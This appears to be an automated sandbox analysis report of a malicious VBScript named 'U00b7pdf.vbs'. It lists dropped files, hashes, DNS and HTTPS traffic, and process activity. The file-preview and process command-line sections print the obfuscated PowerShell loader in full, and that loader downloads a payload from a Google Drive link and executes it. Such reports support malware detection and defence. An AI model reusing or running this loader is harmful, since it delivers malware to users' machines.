                                SHA-512:495171606D9D1CC146CF85E59A6B23170ACD657811DC93E1B66A8AFAC05D0C36EEBBC5F3CE97C064F61469194F2F67A43A31FEE2117C224FE29471DFCB438EFC
                                Malicious:false
                                Reputation:low
                                Preview:p...... .........n.h....(....................................................... ........M.....................i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):1.1940658735648508
                                Encrypted:false
                                SSDEEP:3:Nlllulbnolz:NllUc
                                MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:@...e................................................@..........

                                C:\Users\user\AppData\Local\Temp\Miljforstyrrelsen.txt

                                Download File
                                Process:C:\Windows\System32\wscript.exe
                                File Type:ASCII text, with very long lines (8741), with no line terminators
                                Category:dropped
                                Size (bytes):8741
                                Entropy (8bit):5.137579435081593
                                Encrypted:false
                                SSDEEP:192:BHDSZK0YV6Yk4JGlFbits7e1hvNpZ4icnAwMJ5mCNj6NBiijHG9p:1DSZK0YV6B4JGPGts7e1Tp+ANFIzU
                                MD5:9105A7AC832AB00FCA96838AD8B2E719
                                SHA1:BD6F8B52C934BD17318D62C76E6B44A88A4EF08D
                                SHA-256:13CDD6DF9CE201D6C211761D1C5EA377FC205C998287FBC9D23A6472FEFE6814
                                SHA-512:A983FBA27ABA636CCC36316CD756CF928116B25CA15EB0C35C66F713021E65965AF0FD2A5EFB6BA11D273E04371DD1A9174CC2ABA0874953D4B99BDDEDE016C5
                                Malicious:false
                                Reputation:low
                                Preview:powershell "$Storvesirerne = 1;$Theologizing='Substrin';$Theologizing+='g';Function Rekordjagt($Spermosphere){$Tryghedsnarkomanerne=$Spermosphere.Length-$Storvesirerne;For($Ichthyocentaur=7; $Ichthyocentaur -lt $Tryghedsnarkomanerne; $Ichthyocentaur+=(8)){$Cottiers+=$Spermosphere.$Theologizing.Invoke($Ichthyocentaur, $Storvesirerne);}$Cottiers;}function Dentagra176($nittenaarsfdselsdag){. ($Systematist) ($nittenaarsfdselsdag);}$Skrive=Rekordjagt 'Sammen MRb igttoMantramzMice laiReformbl chattelDiplom aTilsend/Skunk r5bomrker. Stri.i0Revalua Ukrist(StatuslWInadjusiAco otlnknitweadForure ofjantenwButtonhsBrugsbe UnimpaiNWienersTE.itaxi obriqu1Bstern 0Kyriali.Und,rda0Aerodyn; ,uling PaedonyW SpectriAllergenQuadric6 Ekstem4Apodeme; Picker Femrernx Ellekr6exies o4Fo,film;.rontag Spaan ar Disenavvvesf,o:Circumf1Tryllek2Uncompr1Unimma,.volemit0Rygskst)Poriapr Ungka lG EdderkeUngainlcRes ectkUnlyricoSexolog/ovnhuse2 econce0 hummer1Sirupsh0Notidan0Marinae1Andengr0Erkyndi1Trkvogn Diam

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3wvubotk.rc4.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bchpixef.2bn.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Roaming\Irreplaceableness.Suc

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:HTML document, ASCII text, with very long lines (1692), with no line terminators
                                Category:dropped
                                Size (bytes):1692
                                Entropy (8bit):5.1057817841798885
                                Encrypted:false
                                SSDEEP:24:hazsp1XrSlvhXlhEG0qnXXX08Ucq9J8mZoWHMzj+cB7jTsoT9FyVZ81wmna:7p1cmRq+fjsueFYaWJ
                                MD5:197667AD8277E48B84986E653C8415B8
                                SHA1:9065037A8357F66D45B75FBF1FF864A42F216173
                                SHA-256:8CD3537A4D1D6EE904355E2731F0E57432CBD34897C58B31A7F9B39968494000
                                SHA-512:6125B95290CCCAB07DDAE4A44C1868AE86A6473A6167C5713C404ED3F911AC5459544A466E56F212103F5A3FDB96B3CF82F3914C5D079BBC92C6AF3495903DC9
                                Malicious:false
                                Preview:<!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="LpUUTepYXke4rbF2yA1V9w">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor:pointer}.goog-link-button-disabled{color:#ccc;text-decoration:none;cursor:default}body{color:#222;font:normal 13px/1.4 arial,sans-serif;margin:0}.grecaptcha-badge{visibility:hidden}.uc-main{padding-top:50px;text-align:center}#uc-dl-icon{display:inline-block;margin-top:16px;padding-right:1em;vertical-align:top}#uc-text{display:inline-block;max-width:68ex;text-align:left}.uc-error-caption,.uc-warning-caption{color:#222;font-size:16px}#uc-download-link{text-decoration:none}.uc-name-size a{color:#15c;text-decoration:none}.uc-name-size a:visited{color:#61c;text-decoration:none}.uc-name-size a:active{color:#d14836;text-decoration:none}.uc-footer{color:#777;font-size:11px;padding-bottom:5ex;padding-top:5ex;text-align:center}.uc-footer a{colo

                                Static File Info

                                General

                                File type:ASCII text, with CRLF line terminators
                                Entropy (8bit):5.008490228118308
                                TrID:
                                • Visual Basic Script (13500/0) 100.00%
                                File name:U00b7pdf.vbs
                                File size:371'107 bytes
                                MD5:6e74f3450b6a5719b9e71f6ea32295ce
                                SHA1:790344f4225b4a5e904f3e06de6aac6fa9fe58d5
                                SHA256:6c0c6d699be7442dcd1e34507ac5f9103fcf2a220b032e2e7159805c820a0483
                                SHA512:e786b1d77fc45308d923f1a8dcafc4ee7e6a5423e13a4ec4c4a028cb4f358faa6352a4da73c11dcde94be60486ffaa430250c26e5cf7219a58c73d140c040e4d
                                SSDEEP:6144:ixRLaVfs2VTA05zBWJKJqDv9WlmDg6bMiaNb3rczF9V4I5Btg/zRoFTC4vSUUkPX:0GInOiOi9PIM
                                TLSH:FD8428E2CAC52A298A461AB7ED230B338DB4815D73131F3897BDC65D604395C86BFBD4
                                File Content Preview:..Rem rebring superchivalrousness occidentalise19 gangstolen aftgten; biz arrilds highbrowism; halvtredskroneseddels popmusik175; bevgelsesmngder..Rem Oenomel: bygrnsers tilstedevrende kritarchy...Rem Aulacodus kartoteksprogrammerne138 waleskringles clupe

                                File Icon

                                Icon Hash:68d69b8f86ab9a86

                                Network Behavior

                                Download Network PCAP: filteredfull

                                Network Port Distribution

                                • Total Packets: 21
                                • 443 (HTTPS)
                                • 53 (DNS)
                                TimestampSource PortDest PortSource IPDest IP
                                Apr 15, 2024 07:26:10.889549971 CEST49706443192.168.2.8172.217.12.142
                                Apr 15, 2024 07:26:10.889601946 CEST44349706172.217.12.142192.168.2.8
                                Apr 15, 2024 07:26:10.889694929 CEST49706443192.168.2.8172.217.12.142
                                Apr 15, 2024 07:26:10.909672976 CEST49706443192.168.2.8172.217.12.142
                                Apr 15, 2024 07:26:10.909693956 CEST44349706172.217.12.142192.168.2.8
                                Apr 15, 2024 07:26:11.247036934 CEST44349706172.217.12.142192.168.2.8
                                Apr 15, 2024 07:26:11.247142076 CEST49706443192.168.2.8172.217.12.142
                                Apr 15, 2024 07:26:11.248583078 CEST44349706172.217.12.142192.168.2.8
                                Apr 15, 2024 07:26:11.248680115 CEST49706443192.168.2.8172.217.12.142
                                Apr 15, 2024 07:26:11.253257990 CEST49706443192.168.2.8172.217.12.142
                                Apr 15, 2024 07:26:11.253278017 CEST44349706172.217.12.142192.168.2.8
                                Apr 15, 2024 07:26:11.253746033 CEST44349706172.217.12.142192.168.2.8
                                Apr 15, 2024 07:26:11.272105932 CEST49706443192.168.2.8172.217.12.142
                                Apr 15, 2024 07:26:11.316236973 CEST44349706172.217.12.142192.168.2.8
                                Apr 15, 2024 07:26:11.593877077 CEST44349706172.217.12.142192.168.2.8
                                Apr 15, 2024 07:26:11.594095945 CEST44349706172.217.12.142192.168.2.8
                                Apr 15, 2024 07:26:11.594149113 CEST49706443192.168.2.8172.217.12.142
                                Apr 15, 2024 07:26:11.620738029 CEST49706443192.168.2.8172.217.12.142
                                Apr 15, 2024 07:26:11.779486895 CEST49707443192.168.2.8142.250.72.129
                                Apr 15, 2024 07:26:11.779529095 CEST44349707142.250.72.129192.168.2.8
                                Apr 15, 2024 07:26:11.779599905 CEST49707443192.168.2.8142.250.72.129
                                Apr 15, 2024 07:26:11.779970884 CEST49707443192.168.2.8142.250.72.129
                                Apr 15, 2024 07:26:11.779983044 CEST44349707142.250.72.129192.168.2.8
                                Apr 15, 2024 07:26:12.108016968 CEST44349707142.250.72.129192.168.2.8
                                Apr 15, 2024 07:26:12.108175993 CEST49707443192.168.2.8142.250.72.129
                                Apr 15, 2024 07:26:12.110951900 CEST49707443192.168.2.8142.250.72.129
                                Apr 15, 2024 07:26:12.110961914 CEST44349707142.250.72.129192.168.2.8
                                Apr 15, 2024 07:26:12.111511946 CEST44349707142.250.72.129192.168.2.8
                                Apr 15, 2024 07:26:12.112615108 CEST49707443192.168.2.8142.250.72.129
                                Apr 15, 2024 07:26:12.156286001 CEST44349707142.250.72.129192.168.2.8
                                Apr 15, 2024 07:26:12.926942110 CEST44349707142.250.72.129192.168.2.8
                                Apr 15, 2024 07:26:12.927092075 CEST44349707142.250.72.129192.168.2.8
                                Apr 15, 2024 07:26:12.927099943 CEST49707443192.168.2.8142.250.72.129
                                Apr 15, 2024 07:26:12.927129030 CEST44349707142.250.72.129192.168.2.8
                                Apr 15, 2024 07:26:12.927176952 CEST49707443192.168.2.8142.250.72.129
                                Apr 15, 2024 07:26:12.927186012 CEST44349707142.250.72.129192.168.2.8
                                Apr 15, 2024 07:26:12.927242994 CEST44349707142.250.72.129192.168.2.8
                                Apr 15, 2024 07:26:12.927299023 CEST49707443192.168.2.8142.250.72.129
                                Apr 15, 2024 07:26:12.928893089 CEST49707443192.168.2.8142.250.72.129
                                TimestampSource PortDest PortSource IPDest IP
                                Apr 15, 2024 07:26:10.723887920 CEST5096553192.168.2.81.1.1.1
                                Apr 15, 2024 07:26:10.880984068 CEST53509651.1.1.1192.168.2.8
                                Apr 15, 2024 07:26:11.623128891 CEST5918053192.168.2.81.1.1.1
                                Apr 15, 2024 07:26:11.778728962 CEST53591801.1.1.1192.168.2.8

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Apr 15, 2024 07:26:10.723887920 CEST192.168.2.81.1.1.10xb612Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                Apr 15, 2024 07:26:11.623128891 CEST192.168.2.81.1.1.10x868dStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Apr 15, 2024 07:26:04.733999968 CEST1.1.1.1192.168.2.80x2ca9No error (0)windowsupdatebg.s.llnwi.net68.142.107.4A (IP address)IN (0x0001)false
                                Apr 15, 2024 07:26:10.880984068 CEST1.1.1.1192.168.2.80xb612No error (0)drive.google.com172.217.12.142A (IP address)IN (0x0001)false
                                Apr 15, 2024 07:26:11.778728962 CEST1.1.1.1192.168.2.80x868dNo error (0)drive.usercontent.google.com142.250.72.129A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • drive.google.com
                                • drive.usercontent.google.com

                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.849706172.217.12.1424436500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-04-15 05:26:11 UTC215OUTGET /uc?export=download&id=1mm5uFadk5tXjiZeYXjWHHFiXFf-BHVB_ HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                Host: drive.google.com
                                Connection: Keep-Alive
                                2024-04-15 05:26:11 UTC1582INHTTP/1.1 303 See Other
                                Content-Type: application/binary
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Mon, 15 Apr 2024 05:26:11 GMT
                                Location: https://drive.usercontent.google.com/download?id=1mm5uFadk5tXjiZeYXjWHHFiXFf-BHVB_&export=download
                                Strict-Transport-Security: max-age=31536000
                                Cross-Origin-Opener-Policy: same-origin
                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                Content-Security-Policy: script-src 'nonce-7Y0UF-rPspbe2_D2QTSQwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                Server: ESF
                                Content-Length: 0
                                X-XSS-Protection: 0
                                X-Frame-Options: SAMEORIGIN
                                X-Content-Type-Options: nosniff
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.849707142.250.72.1294436500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-04-15 05:26:12 UTC233OUTGET /download?id=1mm5uFadk5tXjiZeYXjWHHFiXFf-BHVB_&export=download HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                Host: drive.usercontent.google.com
                                Connection: Keep-Alive
                                2024-04-15 05:26:12 UTC2112INHTTP/1.1 200 OK
                                X-GUploader-UploadID: ABPtcPorZZ1CXXUh20ZT6KeXpSqT0NolVq-nYpB-3Y5hTJ4mgQoKdm3epa5W4pvR_7LfRGyMYWk
                                Content-Type: text/html; charset=utf-8
                                Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Mon, 15 Apr 2024 05:26:12 GMT
                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                Cross-Origin-Opener-Policy: same-origin
                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                Content-Security-Policy: script-src 'nonce-lIJ_zfLCQB4MXfuQYd4djg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                Cross-Origin-Resource-Policy: same-site
                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                reporting-endpoints: default="/_/DriveUntrustedContentHttp/web-reports?context=eJzjUtDikmLw15BisN47ndUeiJ3SZ7CGAPHqn-dY1wOxEA_Hly-fNrAJXGjZ0MIMAGyaEhc"
                                Content-Length: 1692
                                Server: UploadServer
                                Set-Cookie: NID=513=bYE2r6JPbrxzq2-k-Gzv5FPs6zIv0p-o-ggKTUCCFuUWLW-7QmZYQ4SS1WNMJk6IiZ97SsaJ-MhWMnJA2BBj_Bf1PpV1q7kapezVObiPdz24kiCiyQWnNF7IO6wGb2FnVNuvtf2f-AIzp63NhKaL2bNnf3Scbc3J8wTXTZ9Eghk; expires=Tue, 15-Oct-2024 05:26:12 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Content-Security-Policy: sandbox allow-scripts
                                Connection: close
                                2024-04-15 05:26:12 UTC1692INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c 65 20 44 72 69 76 65 20 2d 20 49 6e 66 65 63 74 65 64 20 66 69 6c 65 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 70 55 55 54 65 70 59 58 6b 65 34 72 62 46 32 79 41 31 56 39 77 22 3e 2e 67 6f 6f 67 2d 6c 69 6e 6b 2d 62 75 74 74 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6f 6c 6f 72 3a 23 31 35 63 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 75 72 73 6f 72
                                Data Ascii: <!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="LpUUTepYXke4rbF2yA1V9w">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                050100s0.0020406080100MB

                                Click to jump to process

                                High Level Behavior Distribution

                                • File
                                • Registry

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:07:26:02
                                Start date:15/04/2024
                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\U00b7pdf.vbs"
                                Imagebase:0x7ff74b840000
                                File size:170'496 bytes
                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true
                                Show Windows behavior

                                File Activities

                                Show Windows behavior

                                Section Activities

                                Show Windows behavior

                                Registry Activities

                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                Show Windows behavior

                                Thread Activities

                                Show Windows behavior

                                Memory Activities

                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                Show Windows behavior

                                Windows UI Activities

                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                General

                                Target ID:2
                                Start time:07:26:07
                                Start date:15/04/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Storvesirerne = 1;$Theologizing='Substrin';$Theologizing+='g';Function Rekordjagt($Spermosphere){$Tryghedsnarkomanerne=$Spermosphere.Length-$Storvesirerne;For($Ichthyocentaur=7; $Ichthyocentaur -lt $Tryghedsnarkomanerne; $Ichthyocentaur+=(8)){$Cottiers+=$Spermosphere.$Theologizing.Invoke($Ichthyocentaur, $Storvesirerne);}$Cottiers;}function Dentagra176($nittenaarsfdselsdag){. ($Systematist) ($nittenaarsfdselsdag);}$Skrive=Rekordjagt 'Sammen MRb igttoMantramzMice laiReformbl chattelDiplom aTilsend/Skunk r5bomrker. Stri.i0Revalua Ukrist(StatuslWInadjusiAco otlnknitweadForure ofjantenwButtonhsBrugsbe UnimpaiNWienersTE.itaxi obriqu1Bstern 0Kyriali.Und,rda0Aerodyn; ,uling PaedonyW SpectriAllergenQuadric6 Ekstem4Apodeme; Picker Femrernx Ellekr6exies o4Fo,film;.rontag Spaan ar Disenavvvesf,o:Circumf1Tryllek2Uncompr1Unimma,.volemit0Rygskst)Poriapr Ungka lG EdderkeUngainlcRes ectkUnlyricoSexolog/ovnhuse2 econce0 hummer1Sirupsh0Notidan0Marinae1Andengr0Erkyndi1Trkvogn DiamantFNonharmiLicen irUncoloueOleatesfNonumbro GlasblxKasse t/ hromat1Copalin2Satanis1 Deriva. Skmtev0Hegemon ';$Rubys=Rekordjagt ' StylteUProsecusOrganiseFade,urr Fjogsf-TyristoASlufssygAn.ideceidentitnShowtimtPeri on ';$Cargoliner=Rekordjagt 'Ast,roih Rep cktSlickertWindroapNonj.rasBoe,neh:Pra inc/Estampi/Mauveagduranophrmalatesistvnersv C ckileTelefon.TrbaadegTornblaoNonreguo ShoalhgBrtsejllkont.nte Voltes.RetstilcVatteriouncathomBaadud,/PaavistuInhalercbane.ak?Frontene Br,dsaxinvocatpv gttaaoDk skoprLubricat portef=OmtalerdSkoleryobrevvekwDubiousnEncastel valitoGipsdepaUnderlodCentime& Undefei,adiostdCon,oci=R.kkest1Bals mmmMo.dilymKatakin5Ar,edtauValentiFAmusivea,orelsndphl.benkSaloond5StatiketKuskeneXB,sttelj VovehaiVitalisZbewidoweCarnosiYOvera eXAld,rmajLhduninWEpa.ortHDaar,kaHAnkl gjF Ventili ,vaporX kanapeFUnmantlf Ma,ked-Karav nB vertisHAdo tivV NonadvBS uljaz_Quotati ';$Constabless=Rekordjagt ' Acture> Immate ';$Systematist=Rekordjagt 'TimbresislavebaeBegonerxSjofeli ';$Ankyloproctia106 = Rekordjagt ' H,ricoe Frank cOmtalenhBeerbiboFreedst Lewist,%OvertypaQ,adrisp synonyp StraffdSerenada Rav lstTorpedoa,rachio% H.plit\WeekendIUsketbarEpicantr h erpre ElectopElephanl KonvenaBod velcAkklimaeGoumieraCircumsbEurop mlSelen gegraablenForsikreUdstra s .ursyls h drum.FacetteSOverratuBastedecEuch,or Solav k&Col.ack&A,gangs GoitereAnsttemcCoazervhSeniorso Proven Contigu$Apperce ';Dentagra176 (Rekordjagt ' Subcya$JourneygMeningol dsboeo Su,ersb ilkombaGnetacelBibliog:Afpa.erHColumbaybec amepSe,plese FluorbrDoerencs LufttreForsyn nAf,rismsStrygejiUnrustibHeldentiGla rinl Krni.ei Draht,tFrictifyOzonate=Washda,(TelefoncSm,dresm hermicdAdoxace Genvisi/.vlningcAdmir l hermov$UncompoAProveninKommandk Unrewoy Ingva lGrimassoHuje trpCowweedrlauds,nokirigamcVe.denst BetutoiCholinea Krimin1Kl,nset0Musikpd6Intermi)pharmac ');Dentagra176 (Rekordjagt 'L gendi$SirrahsgRegulerlFilm.tro ThronibKli ikaapavingslPeridio:DetrudiVWaflibdiTrunkserJunke.egUdmundeiRundkinn H regea Strengl BreastlSatsensyVisumhy= Frif,n$Fatho aCLavritsa HeinerrHier.magDomineeoHjttalelTornskai Lum,ernBestteleP,lleeor Rest,a.D.uglcosAcinetapAfskedslNecrophiSuperfatBiplans(Hem gen$TrnjbrtCUnkerchoFuldbefnRabbites LilithtCelluliaKlagerebIso.iazlCullende frdigesSystemis Akkli.)moujiks ');$Cargoliner=$Virginally[0];Dentagra176 (Rekordjagt 'Ell.kra$BavianhgSansninl,verdazoPa alleb Ac,ievaFjerdral For,se: sisyfoTFjortenrLevemuliOutspartStjko tu,isammebUnderboeSkolemerTilt gec AlgkiruSurfperlFu.ionsasalutatrleik.sg= VaertsNAntropoeFnike.dwDummere-E peditOTillavebOrchiocjRescoreeSpyttebc.ippingtD mogra KromgarS Audiomy alaxisSufeismtP,eudonedecurvemHusband.Epap phNLinkx.peUnintuitMisimag.Porto,rWVinkelse BrantsbUsigtbaComstninl Lunterisa.fundeCiviestn HypopytTric nn ');Dentagra176 (Rekordjagt 'Ejendom$NdkcaudTAm.ulanrTotalisi Str pntAlexiusuReprescb,estsigeMalodorr Ne trac,etleheuGulfyhilIntendeaDittychrScrideu.Schesi HCh,ndroeBreatheaUngdomsdCycloheeFractiorBesi desPastaen[En,kter$BoltheaRCobbl suAfgangsbLgelf ey TilvejsM,sshap] Deemph=Orthoxa$RhesuspS .asovnkEzaskrorRatinepiStraighvFlorineeForhast ');$Reinitializes=Rekordjagt 'HvilendTBestyrkrProdukti EtikettOverwa u VegetebCommunie FrstebrPulsi.nc Kriseru AntimelBe.eficaEstraderRegnska.BestrniDAlbigeno CuffspwReetablnNevaditl,ederalo TabelsaInfantedMisformFMicrospiAlkyderlgluti oeEftersl( Unfrac$ PrerecCDeludinaSn,ptagrRediss,gVamfontoperfectlExos eli ForstanDrvtyggeAugmentrTrretum, ,ernsb$ GibuseOValerolb pidsmulraindroiSk.pfulg Timneva Immor,tPlasmaciStall,noSocialbn Indskrs OronokrRoquelaeRkee.gltWarfaret Frsteiefalsn.nnFlerhedsTrach o) Skrive ';$Reinitializes=$Hypersensibility[1]+$Reinitializes;$Obligationsrettens=$Hypersensibility[0];Dentagra176 (Rekordjagt 'Weeken.$OvigermgMbelsnelHorizonoHydrobrbAraneinaTankstal Crumbl: regentS Bordvie EpicysmFormyndi ThyroafUndistoeThumbdir lyrehaoTidskrauShrinalskva,rat=Gangb.t(Driver.T .kolesePsychoasBolsjevtEfterve-NjagtigPGrimassa nsomsttUniversh Person Guelphi$ Mal ilOPeriferbYngelsolsvin,kdiFranc sgBundtekaFrems,it D,triniBssens oMetacarnDisa.ses Anti erPunctuaeAfskovntvsentlitIntertieNoalsnon Morel,s Aigudh)Perusal ');while (!$Semiferous) {Dentagra176 (Rekordjagt 'Virt.os$hypotymgDisk,ntlAnsvarsoSkruea,bArchdioaCursi gltourers:UdspredCHyperagu Kngtenr h,wlsbcE eterfuA,akolulAuthentiArbejdsotilhrsf1Spygatt6 Krydde0Fukssva= Gryrsa$LaegkartFjortenrShareowuPartikae Alvide ') ;Dentagra176 $Reinitializes;Dentagra176 (Rekordjagt 'DismissSJobb rit odbolaF,turisrSlikportInjust.-Betonb S UnderrlSprezzaeDeltidseLigularpAgtelse stim rn4Capr,ll ');Dentagra176 (Rekordjagt 'U.vener$ HalvdrgFl,mndelFret,oroRedimenbMagis,eaAnensrelOutbble:Sp.dbjnS ArsenieDi,ulgamReproofiO rrsaafUn corneReasc,nr Spl,ttoTo vinkuMetalans menis=Analyse(VideoplTHj.rtebeSidney,s Barkent Sneakb- C epepPAnchis aBorshtatHyperaehKomiker Jeelped$ PlagioOBlunderbInt.osplBaghussiSt.tssagPsycholaAboiteatSlyngeliPointtaoas.hyxin 